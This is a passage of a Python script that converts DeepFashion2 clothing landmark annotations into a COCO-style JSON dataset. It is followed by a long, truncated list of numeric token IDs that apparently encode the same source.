'165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 9,
'name': "skirt",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 10,
'name': "short_sleeved_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 11,
'name': "long_sleeved_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 12,
'name': "vest_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 13,
'name': "sling_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
# categories2
dataset['categories2'].append({
'id': 1,
'name': "commodity",
'supercategory': "fashion",
})
dataset['categories2'].append({
'id': 2,
'name': "model",
'supercategory': "fashion"
})
dataset['categories2'].append({
'id': 3,
'name': "detail",
'supercategory': "fashion"
})
dataset['categories2'].append({
'id': 4,
'name': "specification",
'supercategory': "fashion"
})
dataset['categories2'].append({
'id': 5,
'name': "unknown",
'supercategory': "fashion"
})
# dataset['categories2'].append({
# 'id': 0,
# 'name': "ignore",
# 'supercategory': "fashion"
# })
top_categories = (1, 2, 3, 4, 5, 6)
down_categories = (7, 8, 9)
whole_categories = (10, 11, 12, 13)
categories2_name = ['commodity', 'model', 'detail', 'specification', 'unknown']
part_name = ['ignore', 'top', 'down', 'whole']
total_landmark_nums = [25, 33, 31, 39, 15, 15, 10, 14, 8, 29, 37, 19, 19]
scale_types = ['unknown', 'small', 'modest', 'large']
# all bboxes are truncated, return true
start_id = 150001
num_images = 41960
root_dir = '/Users/fangcheng.ji/Documents/datasets/deepfashion2/train/'
#root_dir = '/Users/fangcheng.ji/Documents/datasets/deepfashion2/train/'
sub_index = 0 # the index of ground truth instance
sub_index2 = 0 # the index of annotations2 ground truth instance
for num in range(start_id, start_id + num_images):
json_name = root_dir + 'annos/' + str(num).zfill(6)+'.json'
image_name = root_dir + 'image/' + str(num).zfill(6)+'.jpg'
print("processing {}".format(image_name))
if (num>=0) and os.path.isfile(image_name):
imag = Image.open(image_name)
width, height = imag.size
items = []
with open(json_name, 'r') as f:
temp = json.loads(f.read())
source = temp['source']
# filter the user data first, only use the shop data in phase 1
if source != 'shop':
continue
pair_id = temp['pair_id']
dataset['images'].append({
'coco_url': '',
'date_captured': '',
'file_name': str(num).zfill(6) + '.jpg',
'flickr_url': '',
'id': num,
'license': 0,
'width': width,
'height': height
})
for i in temp:
if i == 'source' or i=='pair_id':
continue
else:
points = np.zeros(294 * 3)
sub_index = sub_index + 1
# bounding box
box = temp[i]['bounding_box']
w = box[2]-box[0]
h = box[3]-box[1]
x_1 = box[0]
y_1 = box[1]
bbox=[x_1,y_1,w,h]
# category
cat = temp[i]['category_id']
cat_name = temp[i]['category_name']
# other attribute
style = temp[i]['style']
viewpoint = temp[i]['viewpoint']
scale = temp[i]['scale']
zoom_in = temp[i]['zoom_in']
occlusion = temp[i]['occlusion']
#segmentation and landmarks
seg = temp[i]['segmentation']
landmarks = temp[i]['landmarks']
points_x = landmarks[0::3]
points_y = landmarks[1::3]
points_v = landmarks[2::3]
points_x = np.array(points_x)
points_y = np.array(points_y)
points_v = np.array(points_v)
if cat == 1:
for n in range(0, 25):
points[3 * n] = points_x[n]
points[3 * n + 1] = points_y[n]
points[3 * n + 2] = points_v[n]
elif cat ==2:
for n in range(25, 58):
points[3 * n] = points_x[n - 25]
points[3 * n + 1] = points_y[n - 25]
points[3 * n + 2] = points_v[n - 25]
elif cat ==3:
for n in range(58, 89):
points[3 * n] = points_x[n - 58]
points[3 * n + 1] = points_y[n - 58]
points[3 * n + 2] = points_v[n - 58]
elif cat == 4:
for n in range(89, 128):
points[3 * n] = points_x[n - 89]
points[3 * n + 1] = points_y[n - 89]
points[3 * n + 2] = points_v[n - 89]
elif cat == 5:
for n in range(128, 143):
points[3 * n] = points_x[n - 128]
points[3 * n + 1] = points_y[n - 128]
points[3 * n + 2] = points_v[n - 128]
elif cat == 6:
for n in range(143, 158):
points[3 * n] = points_x[n - 143]
points[3 * n + 1] = points_y[n - 143]
points[3 * n + 2] = points_v[n - 143]
elif cat == 7:
for n in range(158, 168):
points[3 * n] = points_x[n - 158]
points[3 * n + 1] = points_y[n - 158]
points[3 * n + 2] = points_v[n - 158]
elif cat == 8:
for n in range(168, 182):
points[3 * n] = points_x[n - 168]
points[3 * n + 1] = points_y[n - 168]
points[3 * n + 2] = points_v[n - 168]
elif cat == 9:
for n in range(182, 190):
points[3 * n] = points_x[n - 182]
points[3 * n + 1] = points_y[n - 182]
points[3 * n + 2] = points_v[n - 182]
elif cat == 10:
for n in range(190, 219):
points[3 * n] = points_x[n - 190]
points[3 * n + 1] = points_y[n - 190]
points[3 * n + 2] = points_v[n - 190]
elif cat == 11:
for n in range(219, 256):
points[3 * n] = points_x[n - 219]
points[3 * n + 1] = points_y[n - 219]
points[3 * n + 2] = points_v[n - 219]
elif cat == 12:
for n in range(256, 275):
points[3 * n] = points_x[n - 256]
points[3 * n + 1] = points_y[n - 256]
points[3 * n + 2] = points_v[n - 256]
elif cat == 13:
for n in range(275, 294):
points[3 * n] = points_x[n - 275]
points[3 * n + 1] = points_y[n - 275]
points[3 * n + 2] = points_v[n - 275]
num_points = len(np.where(points_v > 0)[0])
items.append(item(cat, viewpoint, scale, bbox, num_points))
dataset['annotations'].append({
'area': w*h,
'bbox': bbox,
'category_id': cat,
'id': sub_index,
'pair_id': pair_id,
'image_id': num,
'iscrowd': 0,
'style': style,
'num_keypoints':num_points,
'keypoints':points.tolist()
#'segmentation': seg,
})
# category2_id, part, toward = deepfashion2noah(items, (width, height))
# for test
# if category2_id == 2:
# new_path = image_name.replace('image', categories2_name[category2_id] + '/' + part_name[part])
# else:
# new_path = image_name.replace('image', categories2_name[category2_id])
#
# shutil.move(image_name, new_path)
part = 0
toward = 0
sub_index2 += 1
dataset['annotations2'].append({
'image_id': num,
'id': sub_index2,
'category2_id': random.randint(1, 5),
'part': part if part is not None else 0,
'toward': toward if toward is not None else 0,
'ignore': 1 # 1 means ignore the result
})
json_name = root_dir + 'classification_ignore_19w.json'
with open(json_name, 'w') as f:
json.dump(dataset, f)
| [
11748,
33918,
198,
6738,
350,
4146,
1330,
7412,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
4423,
346,
198,
11748,
28686,
198,
11748,
4738,
198,
198,
19608,
292,
316,
796,
1391,
198,
220,
220,
220,
366,
10951,
1298,
1391,
5512,
198,
220,
220,
220,
366,
677,
4541,
1298,
685,
4357,
198,
220,
220,
220,
366,
17566,
1298,
685,
4357,
198,
220,
220,
220,
366,
34574,
602,
1298,
685,
4357,
198,
220,
220,
220,
366,
34574,
602,
17,
1298,
685,
4357,
198,
220,
220,
220,
366,
66,
26129,
1298,
685,
4357,
198,
220,
220,
220,
366,
66,
26129,
17,
1298,
17635,
198,
92,
198,
198,
19608,
292,
316,
17816,
66,
26129,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
352,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
19509,
62,
82,
7197,
1079,
62,
15600,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
565,
31690,
1600,
198,
220,
220,
220,
705,
2539,
13033,
10354,
37250,
16,
3256,
705,
17,
3256,
705,
18,
3256,
705,
19,
3256,
705,
20,
3256,
705,
21,
3256,
705,
22,
3256,
705,
23,
3256,
705,
24,
3256,
705,
940,
3256,
705,
1157,
3256,
705,
1065,
3256,
705,
1485,
3256,
705,
1415,
3256,
705,
1314,
3256,
705,
1433,
3256,
705,
1558,
3256,
705,
1507,
3256,
705,
1129,
3256,
705,
1238,
3256,
705,
2481,
3256,
705,
1828,
3256,
705,
1954,
3256,
705,
1731,
3256,
705,
1495,
3256,
705,
2075,
3256,
705,
1983,
3256,
705,
2078,
3256,
705,
1959,
3256,
705,
1270,
3256,
705,
3132,
3256,
705,
2624,
3256,
705,
2091,
3256,
705,
2682,
3256,
705,
2327,
3256,
705,
2623,
3256,
705,
2718,
3256,
705,
2548,
3256,
705,
2670,
3256,
705,
1821,
3256,
705,
3901,
3256,
705,
3682,
3256,
705,
3559,
3256,
705,
2598,
3256,
705,
2231,
3256,
705,
3510,
3256,
705,
2857,
3256,
705,
2780,
3256,
705,
2920,
3256,
705,
1120,
3256,
705,
4349,
3256,
705,
4309,
3256,
705,
4310,
3256,
705,
4051,
3256,
705,
2816,
3256,
705,
3980,
3256,
705,
3553,
3256,
705,
3365,
3256,
705,
3270,
3256,
705,
1899,
3256,
705,
5333,
3256,
705,
5237,
3256,
705,
5066,
3256,
705,
2414,
3256,
705,
2996,
3256,
705,
2791,
3256,
705,
3134,
3256,
705,
3104,
3256,
705,
3388,
3256,
705,
2154,
3256,
705,
4869,
3256,
705,
4761,
3256,
705,
4790,
3256,
705,
4524,
3256,
705,
2425,
3256,
705,
4304,
3256,
705,
3324,
3256,
705,
3695,
3256,
705,
3720,
3256,
705,
1795,
3256,
705,
6659,
3256,
705,
6469,
3256,
705,
5999,
3256,
705,
5705,
3256,
705,
5332,
3256,
705,
4521,
3256,
705,
5774,
3256,
705,
3459,
3256,
705,
4531,
3256,
705,
3829,
3256,
705,
6420,
3256,
705,
5892,
3256,
705,
6052,
3256,
705,
5824,
3256,
705,
3865,
3256,
705,
4846,
3256,
705,
5607,
3256,
705,
4089,
3256,
705,
2079,
3256,
705,
3064,
3256,
705,
8784,
3256,
705,
15377,
3256,
705,
15197,
3256,
705,
13464,
3256,
705,
13348,
3256,
705,
15801,
3256,
705,
15982,
3256,
705,
15711,
3256,
705,
14454,
3256,
705,
11442,
3256,
705,
16243,
3256,
705,
14686,
3256,
705,
16616,
3256,
705,
16562,
3256,
705,
15363,
3256,
705,
18298,
3256,
705,
17657,
3256,
705,
16817,
3256,
705,
16315,
3256,
705,
10232,
3256,
705,
19244,
3256,
705,
18376,
3256,
705,
10163,
3256,
705,
17464,
3256,
705,
11623,
3256,
705,
19420,
3256,
705,
16799,
3256,
705,
12762,
3256,
705,
18741,
3256,
705,
12952,
3256,
705,
22042,
3256,
705,
19924,
3256,
705,
16945,
3256,
705,
19880,
3256,
705,
17059,
3256,
705,
20809,
3256,
705,
19708,
3256,
705,
20107,
3256,
705,
20219,
3256,
705,
15187,
3256,
705,
23756,
3256,
705,
23726,
3256,
705,
21139,
3256,
705,
18444,
3256,
705,
18781,
3256,
705,
20964,
3256,
705,
20198,
3256,
705,
18294,
3256,
705,
19442,
3256,
705,
8628,
3256,
705,
24309,
3256,
705,
17827,
3256,
705,
21395,
3256,
705,
21526,
3256,
705,
18742,
3256,
705,
21599,
3256,
705,
18458,
3256,
705,
21273,
3256,
705,
19707,
3256,
705,
14198,
3256,
705,
25948,
3256,
705,
25061,
3256,
705,
24136,
3256,
705,
23237,
3256,
705,
20986,
3256,
705,
23055,
3256,
705,
21940,
3256,
705,
14656,
3256,
705,
22172,
3256,
705,
17279,
3256,
705,
27192,
3256,
705,
23628,
3256,
705,
25399,
3256,
705,
22985,
3256,
705,
17430,
3256,
705,
24096,
3256,
705,
22413,
3256,
705,
23188,
3256,
705,
21738,
3256,
705,
15259,
3256,
705,
27057,
3256,
705,
24294,
3256,
705,
24839,
3256,
705,
22883,
3256,
705,
21652,
3256,
705,
25096,
3256,
705,
23451,
3256,
705,
20356,
3256,
705,
23362,
3256,
705,
19782,
3256,
705,
26492,
3256,
705,
17477,
3256,
705,
24943,
3256,
705,
22913,
3256,
705,
22186,
3256,
705,
25272,
3256,
705,
24991,
3256,
705,
22337,
3256,
705,
19104,
3256,
705,
2167,
3256,
705,
1264,
3256,
705,
19004,
3256,
705,
22416,
3256,
705,
18638,
3256,
705,
21261,
3256,
705,
22136,
3256,
705,
22745,
3256,
705,
21315,
3256,
705,
22567,
3256,
705,
21536,
3256,
705,
21895,
3256,
705,
21777,
3256,
705,
26427,
3256,
705,
22291,
3256,
705,
23349,
3256,
705,
20666,
3256,
705,
24591,
3256,
705,
28727,
3256,
705,
28896,
3256,
705,
17572,
3256,
705,
26115,
3256,
705,
23148,
3256,
705,
22047,
3256,
705,
24137,
3256,
705,
18182,
3256,
705,
24909,
3256,
705,
24403,
3256,
705,
23815,
3256,
705,
23539,
3256,
705,
19214,
3256,
705,
25667,
3256,
705,
24339,
3256,
705,
25429,
3256,
705,
24409,
3256,
705,
22370,
3256,
705,
24940,
3256,
705,
24693,
3256,
705,
23721,
3256,
705,
23516,
3256,
705,
16102,
3256,
705,
28872,
3256,
705,
27877,
3256,
705,
26660,
3256,
705,
25707,
3256,
705,
22995,
3256,
705,
26912,
3256,
705,
23753,
3256,
705,
23045,
3256,
705,
21626,
3256,
705,
9031,
3256,
705,
28072,
3256,
705,
22800,
3256,
705,
28592,
3256,
705,
24970,
3256,
705,
13381,
3256,
705,
11645,
3256,
705,
28676,
3256,
705,
25600,
3256,
705,
25191,
3256,
705,
21719,
3256,
705,
30057,
3256,
705,
29119,
3256,
705,
29558,
3256,
705,
18897,
3256,
705,
22980,
3256,
705,
25540,
3256,
705,
25674,
3256,
705,
25022,
3256,
705,
26276,
3256,
705,
20233,
3256,
705,
28977,
3256,
705,
29807,
3256,
705,
27367,
3256,
705,
28857,
3256,
705,
23195,
3256,
705,
27988,
3256,
705,
27019,
3256,
705,
25870,
3256,
705,
26050,
3256,
705,
21033,
3256,
705,
30368,
3256,
705,
32568,
3256,
705,
30290,
3256,
705,
30336,
3256,
705,
26279,
3256,
705,
27033,
3256,
705,
27800,
3256,
705,
25270,
3256,
705,
27693,
3256,
705,
24369,
3256,
705,
33551,
3256,
705,
32759,
3256,
705,
31675,
3256,
705,
27696,
6,
4357,
198,
220,
220,
220,
705,
82,
38800,
10354,
17635,
198,
30072,
198,
19608,
292,
316,
17816,
66,
26129,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
362,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
6511,
62,
82,
7197,
1079,
62,
15600,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
565,
31690,
1600,
198,
220,
220,
220,
705,
2539,
13033,
10354,
37250,
16,
3256,
705,
17,
3256,
705,
18,
3256,
705,
19,
3256,
705,
20,
3256,
705,
21,
3256,
705,
22,
3256,
705,
23,
3256,
705,
24,
3256,
705,
940,
3256,
705,
1157,
3256,
705,
1065,
3256,
705,
1485,
3256,
705,
1415,
3256,
705,
1314,
3256,
705,
1433,
3256,
705,
1558,
3256,
705,
1507,
3256,
705,
1129,
3256,
705,
1238,
3256,
705,
2481,
3256,
705,
1828,
3256,
705,
1954,
3256,
705,
1731,
3256,
705,
1495,
3256,
705,
2075,
3256,
705,
1983,
3256,
705,
2078,
3256,
705,
1959,
3256,
705,
1270,
3256,
705,
3132,
3256,
705,
2624,
3256,
705,
2091,
3256,
705,
2682,
3256,
705,
2327,
3256,
705,
2623,
3256,
705,
2718,
3256,
705,
2548,
3256,
705,
2670,
3256,
705,
1821,
3256,
705,
3901,
3256,
705,
3682,
3256,
705,
3559,
3256,
705,
2598,
3256,
705,
2231,
3256,
705,
3510,
3256,
705,
2857,
3256,
705,
2780,
3256,
705,
2920,
3256,
705,
1120,
3256,
705,
4349,
3256,
705,
4309,
3256,
705,
4310,
3256,
705,
4051,
3256,
705,
2816,
3256,
705,
3980,
3256,
705,
3553,
3256,
705,
3365,
3256,
705,
3270,
3256,
705,
1899,
3256,
705,
5333,
3256,
705,
5237,
3256,
705,
5066,
3256,
705,
2414,
3256,
705,
2996,
3256,
705,
2791,
3256,
705,
3134,
3256,
705,
3104,
3256,
705,
3388,
3256,
705,
2154,
3256,
705,
4869,
3256,
705,
4761,
3256,
705,
4790,
3256,
705,
4524,
3256,
705,
2425,
3256,
705,
4304,
3256,
705,
3324,
3256,
705,
3695,
3256,
705,
3720,
3256,
705,
1795,
3256,
705,
6659,
3256,
705,
6469,
3256,
705,
5999,
3256,
705,
5705,
3256,
705,
5332,
3256,
705,
4521,
3256,
705,
5774,
3256,
705,
3459,
3256,
705,
4531,
3256,
705,
3829,
3256,
705,
6420,
3256,
705,
5892,
3256,
705,
6052,
3256,
705,
5824,
3256,
705,
3865,
3256,
705,
4846,
3256,
705,
5607,
3256,
705,
4089,
3256,
705,
2079,
3256,
705,
3064,
3256,
705,
8784,
3256,
705,
15377,
3256,
705,
15197,
3256,
705,
13464,
3256,
705,
13348,
3256,
705,
15801,
3256,
705,
15982,
3256,
705,
15711,
3256,
705,
14454,
3256,
705,
11442,
3256,
705,
16243,
3256,
705,
14686,
3256,
705,
16616,
3256,
705,
16562,
3256,
705,
15363,
3256,
705,
18298,
3256,
705,
17657,
3256,
705,
16817,
3256,
705,
16315,
3256,
705,
10232,
3256,
705,
19244,
3256,
705,
18376,
3256,
705,
10163,
3256,
705,
17464,
3256,
705,
11623,
3256,
705,
19420,
3256,
705,
16799,
3256,
705,
12762,
3256,
705,
18741,
3256,
705,
12952,
3256,
705,
22042,
3256,
705,
19924,
3256,
705,
16945,
3256,
705,
19880,
3256,
705,
17059,
3256,
705,
20809,
3256,
705,
19708,
3256,
705,
20107,
3256,
705,
20219,
3256,
705,
15187,
3256,
705,
23756,
3256,
705,
23726,
3256,
705,
21139,
3256,
705,
18444,
3256,
705,
18781,
3256,
705,
20964,
3256,
705,
20198,
3256,
705,
18294,
3256,
705,
19442,
3256,
705,
8628,
3256,
705,
24309,
3256,
705,
17827,
3256,
705,
21395,
3256,
705,
21526,
3256,
705,
18742,
3256,
705,
21599,
3256,
705,
18458,
3256,
705,
21273,
3256,
705,
19707,
3256,
705,
14198,
3256,
705,
25948,
3256,
705,
25061,
3256,
705,
24136,
3256,
705,
23237,
3256,
705,
20986,
3256,
705,
23055,
3256,
705,
21940,
3256,
705,
14656,
3256,
705,
22172,
3256,
705,
17279,
3256,
705,
27192,
3256,
705,
23628,
3256,
705,
25399,
3256,
705,
22985,
3256,
705,
17430,
3256,
705,
24096,
3256,
705,
22413,
3256,
705,
23188,
3256,
705,
21738,
3256,
705,
15259,
3256,
705,
27057,
3256,
705,
24294,
3256,
705,
24839,
3256,
705,
22883,
3256,
705,
21652,
3256,
705,
25096,
3256,
705,
23451,
3256,
705,
20356,
3256,
705,
23362,
3256,
705,
19782,
3256,
705,
26492,
3256,
705,
17477,
3256,
705,
24943,
3256,
705,
22913,
3256,
705,
22186,
3256,
705,
25272,
3256,
705,
24991,
3256,
705,
22337,
3256,
705,
19104,
3256,
705,
2167,
3256,
705,
1264,
3256,
705,
19004,
3256,
705,
22416,
3256,
705,
18638,
3256,
705,
21261,
3256,
705,
22136,
3256,
705,
22745,
3256,
705,
21315,
3256,
705,
22567,
3256,
705,
21536,
3256,
705,
21895,
3256,
705,
21777,
3256,
705,
26427,
3256,
705,
22291,
3256,
705,
23349,
3256,
705,
20666,
3256,
705,
24591,
3256,
705,
28727,
3256,
705,
28896,
3256,
705,
17572,
3256,
705,
26115,
3256,
705,
23148,
3256,
705,
22047,
3256,
705,
24137,
3256,
705,
18182,
3256,
705,
24909,
3256,
705,
24403,
3256,
705,
23815,
3256,
705,
23539,
3256,
705,
19214,
3256,
705,
25667,
3256,
705,
24339,
3256,
705,
25429,
3256,
705,
24409,
3256,
705,
22370,
3256,
705,
24940,
3256,
705,
24693,
3256,
705,
23721,
3256,
705,
23516,
3256,
705,
16102,
3256,
705,
28872,
3256,
705,
27877,
3256,
705,
26660,
3256,
705,
25707,
3256,
705,
22995,
3256,
705,
26912,
3256,
705,
23753,
3256,
705,
23045,
3256,
705,
21626,
3256,
705,
9031,
3256,
705,
28072,
3256,
705,
22800,
3256,
705,
28592,
3256,
705,
24970,
3256,
705,
13381,
3256,
705,
11645,
3256,
705,
28676,
3256,
705,
25600,
3256,
705,
25191,
3256,
705,
21719,
3256,
705,
30057,
3256,
705,
29119,
3256,
705,
29558,
3256,
705,
18897,
3256,
705,
22980,
3256,
705,
25540,
3256,
705,
25674,
3256,
705,
25022,
3256,
705,
26276,
3256,
705,
20233,
3256,
705,
28977,
3256,
705,
29807,
3256,
705,
27367,
3256,
705,
28857,
3256,
705,
23195,
3256,
705,
27988,
3256,
705,
27019,
3256,
705,
25870,
3256,
705,
26050,
3256,
705,
21033,
3256,
705,
30368,
3256,
705,
